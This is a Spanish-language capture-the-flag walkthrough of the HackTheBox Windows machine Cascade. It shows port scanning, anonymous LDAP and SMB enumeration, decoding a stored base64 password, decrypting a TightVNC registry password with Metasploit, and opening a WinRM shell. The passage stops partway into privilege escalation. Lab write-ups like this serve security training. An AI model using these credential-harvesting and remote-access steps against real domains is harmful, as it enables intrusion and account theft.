Cascade es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox y es de dificultad media.
En este caso se trata de una máquina basada en el Sistema Operativo Windows.
Índice
Escaneo de puertos
Como de costumbre, agregamos la IP de la máquina Cascade 10.10.10.182 a /etc/hosts como cascade.htb y comenzamos con el escaneo de puertos nmap.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
# Nmap 7.80 scan initiated Fri May 15 00:35:15 2020 as: nmap -sV -Pn -p- -oA cascade-nmap 10.10.10.182 Nmap scan report for 10.10.10.182 Host is up (0.055s latency). Not shown: 65520 filtered ports PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-14 22:48:29Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC 49165/tcp open msrpc Microsoft Windows RPC Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri May 15 00:45:39 2020 -- 1 IP address (1 host up) scanned in 623.75 seconds |
Detectamos varios puertos abiertos que procedemos a enumerar a continuación.
Enumeración
Comenzamos la enumeración con la herramienta enum4linux, donde obtenemos información del dominio, usuarios y grupos del sistema entre otras cosas.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 |
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri May 15 00:52:41 2020 ========================== | Target Information | ========================== Target ........... 10.10.10.182 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ==================================================== | Enumerating Workgroup/Domain on 10.10.10.182 | ==================================================== [E] Can't find workgroup/domain ============================================ | Nbtstat Information for 10.10.10.182 | ============================================ Looking up status of 10.10.10.182 No reply from 10.10.10.182 ===================================== | Session Check on 10.10.10.182 | ===================================== [+] Server 10.10.10.182 allows sessions using username '', password '' [+] Got domain/workgroup name: =========================================== | Getting domain SID for 10.10.10.182 | =========================================== Domain Name: CASCADE Domain Sid: S-1-5-21-3332504370-1206983947-1165150453 [+] Host is part of a domain (not a workgroup) ====================================== | OS information on 10.10.10.182 | ====================================== [+] Got OS info for 10.10.10.182 from smbclient: [+] Got OS info for 10.10.10.182 from srvinfo: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED ============================= | Users on 10.10.10.182 | ============================= index: 0xee0 RID: 0x464 acb: 0x00000214 Account: a.turnbull Name: Adrian Turnbull Desc: (null) index: 0xebc RID: 0x452 acb: 0x00000210 Account: arksvc Name: ArkSvc Desc: (null) index: 0xee4 RID: 0x468 acb: 0x00000211 Account: b.hanson Name: Ben Hanson Desc: (null) index: 0xee7 RID: 0x46a acb: 0x00000210 Account: BackupSvc Name: BackupSvc Desc: (null) index: 0xdeb RID: 0x1f5 acb: 0x00000215 Account: CascGuest Name: (null) Desc: Built-in account for guest access to the computer/domain index: 0xee5 RID: 0x469 acb: 0x00000210 Account: d.burman Name: David Burman Desc: (null) index: 0xee3 RID: 0x467 acb: 0x00000211 Account: e.crowe Name: Edward Crowe Desc: (null) index: 0xeec RID: 0x46f acb: 0x00000211 Account: i.croft Name: Ian Croft Desc: (null) index: 0xeeb RID: 0x46e acb: 0x00000210 Account: j.allen Name: Joseph Allen Desc: (null) index: 0xede RID: 0x462 acb: 0x00000210 Account: j.goodhand Name: John Goodhand Desc: (null) index: 0xed7 RID: 0x45c acb: 0x00000210 Account: j.wakefield Name: James Wakefield Desc: (null) index: 0xeca RID: 0x455 acb: 0x00000210 Account: r.thompson Name: Ryan Thompson Desc: (null) index: 0xedd RID: 0x461 acb: 0x00000210 Account: s.hickson Name: Stephanie Hickson Desc: (null) index: 0xebd RID: 0x453 acb: 0x00000210 Account: s.smith Name: Steve Smith Desc: (null) index: 0xed2 RID: 0x457 acb: 0x00000210 Account: util Name: Util Desc: (null) user:[CascGuest] rid:[0x1f5] user:[arksvc] rid:[0x452] user:[s.smith] rid:[0x453] user:[r.thompson] rid:[0x455] user:[util] rid:[0x457] user:[j.wakefield] rid:[0x45c] user:[s.hickson] rid:[0x461] user:[j.goodhand] rid:[0x462] user:[a.turnbull] rid:[0x464] user:[e.crowe] rid:[0x467] user:[b.hanson] rid:[0x468] user:[d.burman] rid:[0x469] user:[BackupSvc] rid:[0x46a] user:[j.allen] rid:[0x46e] user:[i.croft] rid:[0x46f] ========================================= | Share Enumeration on 10.10.10.182 | ========================================= Sharename Type Comment --------- ---- ------- SMB1 disabled -- no workgroup available [+] Attempting to map shares on 10.10.10.182 ==================================================== | Password Policy Information for 10.10.10.182 | ==================================================== [+] Attaching to 10.10.10.182 using a NULL share [+] Trying protocol 139/SMB... [!] Protocol failed: Cannot request session (Called Name:10.10.10.182) [+] Trying protocol 445/SMB... [+] Found domain(s): [+] CASCADE [+] Builtin [+] Password Info for Domain: CASCADE [+] Minimum password length: 5 [+] Password history length: None [+] Maximum password age: Not Set [+] Password Complexity Flags: 000000 [+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0 [+] Minimum password age: None [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: Not Set [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 5 ============================== | Groups on 10.10.10.182 | ============================== [+] Getting builtin groups: group:[Pre-Windows 2000 Compatible Access] rid:[0x22a] group:[Incoming Forest Trust Builders] rid:[0x22d] group:[Windows Authorization Access Group] rid:[0x230] group:[Terminal Server License Servers] rid:[0x231] group:[Users] rid:[0x221] group:[Guests] rid:[0x222] group:[Remote Desktop Users] rid:[0x22b] group:[Network Configuration Operators] rid:[0x22c] group:[Performance Monitor Users] rid:[0x22e] group:[Performance Log Users] rid:[0x22f] group:[Distributed COM Users] rid:[0x232] group:[IIS_IUSRS] rid:[0x238] group:[Cryptographic Operators] rid:[0x239] group:[Event Log Readers] rid:[0x23d] group:[Certificate Service DCOM Access] rid:[0x23e] [+] Getting builtin group memberships: Group 'Guests' (RID: 546) has member: CASCADE\CascGuest Group 'Guests' (RID: 546) has member: CASCADE\Domain Guests Group 'Windows Authorization Access Group' (RID: 560) has member: NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS Group 'Pre-Windows 2000 Compatible Access' (RID: 554) has member: NT AUTHORITY\Authenticated Users Group 'Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE Group 'Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users Group 'Users' (RID: 545) has member: CASCADE\Domain Users [+] Getting local groups: group:[Cert Publishers] rid:[0x205] group:[RAS and IAS Servers] rid:[0x229] group:[Allowed RODC Password Replication Group] rid:[0x23b] group:[Denied RODC Password Replication Group] rid:[0x23c] group:[DnsAdmins] rid:[0x44e] group:[IT] rid:[0x459] group:[Production] rid:[0x45a] group:[HR] rid:[0x45b] group:[AD Recycle Bin] rid:[0x45f] group:[Backup] rid:[0x460] group:[Temps] rid:[0x463] group:[WinRMRemoteWMIUsers__] rid:[0x465] group:[Remote Management Users] rid:[0x466] group:[Factory] rid:[0x46c] group:[Finance] rid:[0x46d] group:[Audit Share] rid:[0x471] group:[Data Share] rid:[0x472] [+] Getting local group memberships: Group 'Remote Management Users' (RID: 1126) has member: CASCADE\arksvc Group 'Remote Management Users' (RID: 1126) has member: CASCADE\s.smith Group 'IT' (RID: 1113) has member: CASCADE\arksvc Group 'IT' (RID: 1113) has member: CASCADE\s.smith Group 'IT' (RID: 1113) has member: CASCADE\r.thompson Group 'HR' (RID: 1115) has member: CASCADE\s.hickson Group 'Data Share' (RID: 1138) has member: CASCADE\Domain Users Group 'Audit Share' (RID: 1137) has member: CASCADE\s.smith Group 'AD Recycle Bin' (RID: 1119) has member: CASCADE\arksvc Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\krbtgt Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Domain Controllers Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Schema Admins Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Enterprise Admins Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Cert Publishers Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Domain Admins Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Group Policy Creator Owners Group 'Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Read-only Domain Controllers [+] Getting domain groups: group:[Enterprise Read-only Domain Controllers] rid:[0x1f2] group:[Domain Users] rid:[0x201] group:[Domain Guests] rid:[0x202] group:[Domain Computers] rid:[0x203] group:[Group Policy Creator Owners] rid:[0x208] group:[DnsUpdateProxy] rid:[0x44f] [+] Getting domain group memberships: Group 'Group Policy Creator Owners' (RID: 520) has member: CASCADE\administrator Group 'Domain Guests' (RID: 514) has member: CASCADE\CascGuest Group 'Domain Users' (RID: 513) has member: CASCADE\administrator Group 'Domain Users' (RID: 513) has member: CASCADE\krbtgt Group 'Domain Users' (RID: 513) has member: CASCADE\arksvc Group 'Domain Users' (RID: 513) has member: CASCADE\s.smith Group 'Domain Users' (RID: 513) has member: CASCADE\r.thompson Group 'Domain Users' (RID: 513) has member: CASCADE\util Group 'Domain Users' (RID: 513) has member: CASCADE\j.wakefield Group 'Domain Users' (RID: 513) has member: CASCADE\s.hickson Group 'Domain Users' (RID: 513) has member: CASCADE\j.goodhand Group 'Domain Users' (RID: 513) has member: CASCADE\a.turnbull Group 'Domain Users' (RID: 513) has member: CASCADE\e.crowe Group 'Domain Users' (RID: 513) has member: CASCADE\b.hanson Group 'Domain Users' (RID: 513) has member: CASCADE\d.burman Group 'Domain Users' (RID: 513) has member: CASCADE\BackupSvc Group 'Domain Users' (RID: 513) has member: CASCADE\j.allen Group 'Domain Users' (RID: 513) has member: CASCADE\i.croft ======================================================================= | Users on 10.10.10.182 via RID cycling (RIDS: 500-550,1000-1050) | ======================================================================= [I] Found new SID: S-1-5-21-3332504370-1206983947-1165150453 [I] Found new SID: S-1-5-21-2189247330-517467924-712900258 [+] Enumerating users using SID S-1-5-21-3332504370-1206983947-1165150453 and logon username '', password '' S-1-5-21-3332504370-1206983947-1165150453-500 CASCADE\administrator (Local User) S-1-5-21-3332504370-1206983947-1165150453-501 CASCADE\CascGuest (Local User) S-1-5-21-3332504370-1206983947-1165150453-502 CASCADE\krbtgt (Local User) S-1-5-21-3332504370-1206983947-1165150453-512 CASCADE\Domain Admins (Domain Group) S-1-5-21-3332504370-1206983947-1165150453-513 CASCADE\Domain Users (Domain Group) S-1-5-21-3332504370-1206983947-1165150453-514 CASCADE\Domain Guests (Domain Group) S-1-5-21-3332504370-1206983947-1165150453-515 CASCADE\Domain Computers (Domain Group) S-1-5-21-3332504370-1206983947-1165150453-516 CASCADE\Domain Controllers (Domain Group) S-1-5-21-3332504370-1206983947-1165150453-517 CASCADE\Cert Publishers (Local Group) S-1-5-21-3332504370-1206983947-1165150453-518 CASCADE\Schema Admins (Domain Group) S-1-5-21-3332504370-1206983947-1165150453-519 CASCADE\Enterprise Admins (Domain Group) S-1-5-21-3332504370-1206983947-1165150453-520 CASCADE\Group Policy Creator Owners (Domain Group) S-1-5-21-3332504370-1206983947-1165150453-521 CASCADE\Read-only Domain Controllers (Domain Group) S-1-5-21-3332504370-1206983947-1165150453-1001 CASCADE\CASC-DC1$ (Local User) [+] Enumerating users using SID S-1-5-21-2189247330-517467924-712900258 and logon username '', password '' S-1-5-21-2189247330-517467924-712900258-500 CASC-DC1\Administrator (Local User) S-1-5-21-2189247330-517467924-712900258-501 CASC-DC1\Guest (Local User) S-1-5-21-2189247330-517467924-712900258-513 CASC-DC1\None (Domain Group) ============================================= | Getting printer info for 10.10.10.182 | ============================================= Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED enum4linux complete on Fri May 15 00:59:00 2020 |
Continuamos con la enumeración de ldap, realizamos un primera enumeración para obtener más información del sistema:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 |
$ ldapsearch -H ldap://10.10.10.182 -x -s base '' "(objectClass=*)" "*" # extended LDIF # # LDAPv3 # base <> (default) with scope baseObject # filter: (objectclass=*) # requesting: (objectClass=*) * # # dn: currentTime: 20200515065604.0Z subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=cascade,DC=local dsServiceName: CN=NTDS Settings,CN=CASC-DC1,CN=Servers,CN=Default-First-Site-N ame,CN=Sites,CN=Configuration,DC=cascade,DC=local namingContexts: DC=cascade,DC=local namingContexts: CN=Configuration,DC=cascade,DC=local namingContexts: CN=Schema,CN=Configuration,DC=cascade,DC=local namingContexts: DC=DomainDnsZones,DC=cascade,DC=local namingContexts: DC=ForestDnsZones,DC=cascade,DC=local defaultNamingContext: DC=cascade,DC=local schemaNamingContext: CN=Schema,CN=Configuration,DC=cascade,DC=local configurationNamingContext: CN=Configuration,DC=cascade,DC=local rootDomainNamingContext: DC=cascade,DC=local supportedControl: 1.2.840.113556.1.4.319 supportedControl: 1.2.840.113556.1.4.801 supportedControl: 1.2.840.113556.1.4.473 supportedControl: 1.2.840.113556.1.4.528 supportedControl: 1.2.840.113556.1.4.417 supportedControl: 1.2.840.113556.1.4.619 supportedControl: 1.2.840.113556.1.4.841 supportedControl: 1.2.840.113556.1.4.529 supportedControl: 1.2.840.113556.1.4.805 supportedControl: 1.2.840.113556.1.4.521 supportedControl: 1.2.840.113556.1.4.970 supportedControl: 1.2.840.113556.1.4.1338 supportedControl: 1.2.840.113556.1.4.474 supportedControl: 1.2.840.113556.1.4.1339 supportedControl: 1.2.840.113556.1.4.1340 supportedControl: 1.2.840.113556.1.4.1413 supportedControl: 2.16.840.1.113730.3.4.9 supportedControl: 2.16.840.1.113730.3.4.10 supportedControl: 1.2.840.113556.1.4.1504 supportedControl: 1.2.840.113556.1.4.1852 supportedControl: 1.2.840.113556.1.4.802 supportedControl: 1.2.840.113556.1.4.1907 supportedControl: 1.2.840.113556.1.4.1948 supportedControl: 1.2.840.113556.1.4.1974 supportedControl: 1.2.840.113556.1.4.1341 supportedControl: 1.2.840.113556.1.4.2026 supportedControl: 1.2.840.113556.1.4.2064 supportedControl: 1.2.840.113556.1.4.2065 supportedControl: 1.2.840.113556.1.4.2066 supportedLDAPVersion: 3 supportedLDAPVersion: 2 supportedLDAPPolicies: MaxPoolThreads supportedLDAPPolicies: MaxDatagramRecv supportedLDAPPolicies: MaxReceiveBuffer supportedLDAPPolicies: InitRecvTimeout supportedLDAPPolicies: MaxConnections supportedLDAPPolicies: MaxConnIdleTime supportedLDAPPolicies: MaxPageSize supportedLDAPPolicies: MaxQueryDuration supportedLDAPPolicies: MaxTempTableSize supportedLDAPPolicies: MaxResultSetSize supportedLDAPPolicies: MinResultSets supportedLDAPPolicies: MaxResultSetsPerConn supportedLDAPPolicies: MaxNotificationPerConn supportedLDAPPolicies: MaxValRange supportedLDAPPolicies: ThreadMemoryLimit supportedLDAPPolicies: SystemMemoryLimitPercent highestCommittedUSN: 319671 supportedSASLMechanisms: GSSAPI supportedSASLMechanisms: GSS-SPNEGO supportedSASLMechanisms: EXTERNAL supportedSASLMechanisms: DIGEST-MD5 dnsHostName: CASC-DC1.cascade.local ldapServiceName: cascade.local:casc-dc1$@CASCADE.LOCAL serverName: CN=CASC-DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Conf iguration,DC=cascade,DC=local supportedCapabilities: 1.2.840.113556.1.4.800 supportedCapabilities: 1.2.840.113556.1.4.1670 supportedCapabilities: 1.2.840.113556.1.4.1791 supportedCapabilities: 1.2.840.113556.1.4.1935 supportedCapabilities: 1.2.840.113556.1.4.2080 isSynchronized: TRUE isGlobalCatalogReady: TRUE domainFunctionality: 4 forestFunctionality: 4 domainControllerFunctionality: 4 # search result search: 2 result: 0 Success # numResponses: 2 # numEntries: 1 |
Conociendo más datos del dominio hacemos una segunda enumeración con ldapsearch, en este caso no pego todo el contenido, pero obtenemos un dato interesante del usuario Ryan Thompson:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 |
# Ryan Thompson, Users, UK, cascade.local dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user cn: Ryan Thompson sn: Thompson givenName: Ryan distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local instanceType: 4 whenCreated: 20200109193126.0Z whenChanged: 20200515065503.0Z displayName: Ryan Thompson uSNCreated: 24610 memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local uSNChanged: 319671 name: Ryan Thompson objectGUID:: LfpD6qngUkupEy9bFXBBjA== userAccountControl: 66048 badPwdCount: 0 codePage: 0 countryCode: 0 badPasswordTime: 132339995497786666 lastLogoff: 0 lastLogon: 132339995816183226 pwdLastSet: 132230718862636251 primaryGroupID: 513 objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA== accountExpires: 9223372036854775807 logonCount: 2 sAMAccountName: r.thompson sAMAccountType: 805306368 userPrincipalName: r.thompson@cascade.local objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local dSCorePropagationData: 20200126183918.0Z dSCorePropagationData: 20200119174753.0Z dSCorePropagationData: 20200119174719.0Z dSCorePropagationData: 20200119174508.0Z dSCorePropagationData: 16010101000000.0Z lastLogonTimestamp: 132339993030642333 msDS-SupportedEncryptionTypes: 0 cascadeLegacyPwd: clk0bjVldmE= |
En el último campo observamos lo que parece una pasword:
1 |
cascadeLegacyPwd: clk0bjVldmE= |
Decodificamos el base64 obtenido y tenemos la password del usuario r.thompson:
1 2 |
$ echo "clk0bjVldmE="|base64 -d rY4n5eva |
Continuamos la enumeración y procedemos a buscar información con smb, descubierto en el escaneo, con las credenciales obtenidas:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
$ smbclient -U "r.thompson" -L \\\\10.10.10.182\\ Enter WORKGROUP\r.thompson's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin Audit$ Disk C$ Disk Default share Data Disk IPC$ IPC Remote IPC NETLOGON Disk Logon server share print$ Disk Printer Drivers SYSVOL Disk Logon server share SMB1 disabled -- no workgroup available |
Continuamos la enumeración con el directorio Data:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
$ smbclient -U "r.thompson" \\\\10.10.10.182\\Data Enter WORKGROUP\r.thompson's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Mon Jan 27 04:27:34 2020 .. D 0 Mon Jan 27 04:27:34 2020 Contractors D 0 Mon Jan 13 02:45:11 2020 Finance D 0 Mon Jan 13 02:45:06 2020 IT D 0 Tue Jan 28 19:04:51 2020 Production D 0 Mon Jan 13 02:45:18 2020 Temps D 0 Mon Jan 13 02:45:15 2020 13106687 blocks of size 4096. 7792857 blocks available smb: \> |
Y encontramos un fichero interesante en la carpeta IT, lo descargamos:
1 2 3 4 5 6 7 8 9 |
smb: \IT\> cd "Email Archives" smb: \IT\Email Archives\> ls . D 0 Tue Jan 28 19:00:30 2020 .. D 0 Tue Jan 28 19:00:30 2020 Meeting_Notes_June_2018.html A 2522 Tue Jan 28 19:00:12 2020 13106687 blocks of size 4096. 7792597 blocks available smb: \IT\Email Archives\> get Meeting_Notes_June_2018.html getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as Meeting_Notes_June_2018.html (11,0 KiloBytes/sec) (average 11,0 KiloBytes/sec) |
Y revisamos su contenido:
1 2 3 4 |
<p>-- We will be using a temporary account to perform all tasks related to the network migration and this account will be deleted at the end of 2018 once the migration is complete. This will allow us to identify actions related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password). </p> |
Nos indica que para la migración se utilizó el usuario TempAdmin, cuya password en la misma que dispone el usuario admin de la máquina, por lo que esto puede sernos muy útil más adelante.
Continuamos buscando y encontramos en la carpeta del usuario s.smith otro fichero que descargaremos:
1 2 3 4 5 6 7 8 9 |
smb: \IT\Temp\s.smith\> ls . D 0 Tue Jan 28 21:00:01 2020 .. D 0 Tue Jan 28 21:00:01 2020 VNC Install.reg A 2680 Tue Jan 28 20:27:44 2020 13106687 blocks of size 4096. 7792855 blocks available smb: \IT\Temp\s.smith\> get "VNC Install.reg" getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (11,6 KiloBytes/sec) (average 11,2 KiloBytes/sec) smb: \IT\Temp\s.smith\> |
Y cuyo contenido es el siguiente:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 |
Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC] [HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server] "ExtraPorts"="" "QueryTimeout"=dword:0000001e "QueryAcceptOnTimeout"=dword:00000000 "LocalInputPriorityTimeout"=dword:00000003 "LocalInputPriority"=dword:00000000 "BlockRemoteInput"=dword:00000000 "BlockLocalInput"=dword:00000000 "IpAccessControl"="" "RfbPort"=dword:0000170c "HttpPort"=dword:000016a8 "DisconnectAction"=dword:00000000 "AcceptRfbConnections"=dword:00000001 "UseVncAuthentication"=dword:00000001 "UseControlAuthentication"=dword:00000000 "RepeatControlAuthentication"=dword:00000000 "LoopbackOnly"=dword:00000000 "AcceptHttpConnections"=dword:00000001 "LogLevel"=dword:00000000 "EnableFileTransfers"=dword:00000001 "RemoveWallpaper"=dword:00000001 "UseD3D"=dword:00000001 "UseMirrorDriver"=dword:00000001 "EnableUrlParams"=dword:00000001 "Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f "AlwaysShared"=dword:00000000 "NeverShared"=dword:00000000 "DisconnectClients"=dword:00000001 "PollingInterval"=dword:000003e8 "AllowLoopback"=dword:00000000 "VideoRecognitionInterval"=dword:00000bb8 "GrabTransparentWindows"=dword:00000001 "SaveLogToAllUsersPath"=dword:00000000 "RunControlInterface"=dword:00000001 "IdleTimeout"=dword:00000000 "VideoClasses"="" "VideoRects"="" |
Encontramos en el mismo unas credenciales en formato hexadecimal, pero parece que al descifrar las mismas no nos dan una contraseña que podamos dar como válida. Buscamos en google con el nombre del fichero y encontramos un repositorio en github donde explica la posibilidad de descifrar las mismas mediante metasploit, así que procedemos a ello para conseguir las mismas en plano:
1 2 3 4 5 6 7 8 9 10 |
msf5 > irb [*] Starting IRB shell... [*] You are in the "framework" object >> fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07" => "\u0017Rk\u0006#NX\a" >> require 'rex/proto/rfb' => true >> Rex::Proto::RFB::Cipher.decrypt ["6bcf2a4b6e5aca0f"].pack('H*'), fixedkey => "sT333ve2" |
Obteniendo la flag de user
Con las credenciales obtenidas del usuario s.smith en el último paso accedemos a la instancia mediante la herramienta evil-winrm:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
$ ruby evil-winrm.rb -i 10.10.10.182 -u "s.smith" -p 'sT333ve2' Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\s.smith\Documents> whoami cascade\s.smith *Evil-WinRM* PS C:\Users\s.smith\Documents>cd ..\desktop *Evil-WinRM* PS C:\Users\s.smith\desktop> dir Directory: C:\Users\s.smith\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 5/15/2020 2:56 PM 34 user.txt *Evil-WinRM* PS C:\Users\s.smith\desktop> |
Y ya tenemos la flag de user, esta máquina requería de mucha enumeración para lograr este objetivo, pero todavía estamos a mitad de camino.
Escalado de privilegios
Ahora nos toca buscar información para conseguir la posibilidad de escalar al usuario Administrator, buscaremos en primer lugar los permisos y grupos de los que dispone el usuario s.smith:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 |
*Evil-WinRM* PS C:\> whoami /all USER INFORMATION ---------------- User Name SID =============== ============================================== cascade\s.smith S-1-5-21-3332504370-1206983947-1165150453-1107 GROUP INFORMATION ----------------- Group Name Type SID Attributes =========================================== ================ ============================================== ================== ============================================= Everyone Well-known group S-1-1-0 Mandatory group, E nabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, E nabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, E nabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, E nabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, E nabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, E nabled by default, Enabled group CASCADE\Data Share Alias S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group CASCADE\Audit Share Alias S-1-5-21-3332504370-1206983947-1165150453-1137 Mandatory group, Enabled by default, Enabled group, Local Group CASCADE\IT Alias S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group CASCADE\Remote Management Users Alias S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448 PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled |
Y nos damos cuenta de que este usuario pertenece al grupo Audit Share, por lo que nos toca volver al smb a ver que podemos encontrar dentro de la carpeta Audit$ que vimos anteriormente pero no teníamos permisos suficientes con el usuario r.thompson.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 |
$ smbclient -U "s.smith" \\\\10.10.10.182\\Audit$ Enter WORKGROUP\s.smith's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Jan 29 19:01:26 2020 .. D 0 Wed Jan 29 19:01:26 2020 CascAudit.exe A 13312 Tue Jan 28 22:46:51 2020 CascCrypto.dll A 12288 Wed Jan 29 19:00:20 2020 DB D 0 Tue Jan 28 22:40:59 2020 RunAudit.bat A 45 Wed Jan 29 00:29:47 2020 System.Data.SQLite.dll A 363520 Sun Oct 27 07:38:36 2019 System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 07:38:38 2019 x64 D 0 Sun Jan 26 23:25:27 2020 x86 D 0 Sun Jan 26 23:25:27 2020 13106687 blocks of size 4096. 7783000 blocks available smb: \> recurse on smb: \> ls . D 0 Wed Jan 29 19:01:26 2020 .. D 0 Wed Jan 29 19:01:26 2020 CascAudit.exe A 13312 Tue Jan 28 22:46:51 2020 CascCrypto.dll A 12288 Wed Jan 29 19:00:20 2020 DB D 0 Tue Jan 28 22:40:59 2020 RunAudit.bat A 45 Wed Jan 29 00:29:47 2020 System.Data.SQLite.dll A 363520 Sun Oct 27 07:38:36 2019 System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 07:38:38 2019 x64 D 0 Sun Jan 26 